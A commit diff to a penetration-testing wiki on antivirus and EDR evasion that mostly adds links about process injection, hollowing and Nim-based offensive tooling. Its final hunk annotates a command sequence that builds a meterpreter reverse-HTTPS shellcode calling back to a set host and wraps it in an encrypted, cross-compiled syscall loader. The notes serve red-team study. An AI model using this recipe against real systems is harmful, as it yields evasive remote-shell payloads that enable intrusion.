[AHK] Automatic update 👽

pentest/infrastructure/ad/av-evasion/README.md

@@ -8,6 +8,7 @@
 * [https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8](https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8)
 * [https://xakep.ru/2020/12/23/shikata-ga-nai/](https://xakep.ru/2020/12/23/shikata-ga-nai/)
 * [https://infosecwriteups.com/evade-avs-edr-with-shellcode-injection-159dde4dba1a?gi=84db9a8c5c5f](https://infosecwriteups.com/evade-avs-edr-with-shellcode-injection-159dde4dba1a?gi=84db9a8c5c5f)
+* [https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/](https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/)
 * [https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/](https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/)
 
 

pentest/infrastructure/ad/av-evasion/code-injection/README.md

@@ -2,3 +2,14 @@
 
 * [https://yuval0x92.wordpress.com/2020/03/09/native-api-win32-api/](https://yuval0x92.wordpress.com/2020/03/09/native-api-win32-api/)
 * [https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process)
+
+
+
+
+## Tools
+
+
+
+### Injector
+
+* [https://github.com/0xDivyanshu/Injector](https://github.com/0xDivyanshu/Injector)

pentest/infrastructure/ad/av-evasion/code-injection/process-injectors.md

@@ -70,7 +70,7 @@ namespace ProcessInjector
 {% endcode %}
 
 {% hint style="info" %}
-When compiling the binary, remember that there're 4 potential ways to perform the migration:
+When selecting architecture during compilation, remember that there're 4 potential ways to perform the migration:
 
 1. 64-bit → 64-bit: succeeds.
 2. 64-bit → 32-bit: succeeds.
@@ -389,6 +389,5 @@ namespace ProcessHollower
 ### Hollow with EXE
 
 * [https://github.com/m0n0ph1/Process-Hollowing](https://github.com/m0n0ph1/Process-Hollowing)
+* [https://gist.github.com/gnh1201/6a3836468c898f7ad3a3656e6f24dce3](https://gist.github.com/gnh1201/6a3836468c898f7ad3a3656e6f24dce3)
 * [https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations](https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations)
-
-![](/.gitbook/assets/009.jpg)

pentest/infrastructure/ad/av-evasion/nim.md

@@ -3,6 +3,7 @@
 * [https://github.com/byt3bl33d3r/OffensiveNim](https://github.com/byt3bl33d3r/OffensiveNim)
 * [https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/](https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/)
 * [https://github.com/S3cur3Th1sSh1t/Creds/tree/master/nim](https://github.com/S3cur3Th1sSh1t/Creds/tree/master/nim)
+* [https://huskyhacks.dev/2021/07/17/nim-exploit-dev/](https://huskyhacks.dev/2021/07/17/nim-exploit-dev/)
 
 
 
@@ -90,9 +91,13 @@ How-to:
 * [https://github.com/S3cur3Th1sSh1t/Creds/blob/master/nim/encrypted_shellcode_loader_syscalls.nim](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/nim/encrypted_shellcode_loader_syscalls.nim)
 
 ```
+ # Generate a shellcode
 $ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.16.18 LPORT=443 -e x64/xor -b '\x00' -f csharp
+ # Copy the shellcode into the 1st template and compile
 $ nim c encrypt_shellcode.nim
+ # Encrypt the shellcode and write contents into a file
 $ ./encrypt_shellcode 'Passw0rd!' b64.txt
+ # Copy encrypted shellcode into the 2nd template and compile
 $ cat b64.txt | xclip -i -sel c
 $ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc -d:danger -d:strip --opt:size --passC=-flto --passL=-flto encrypted_shellcode_loader_syscalls.nim
 ```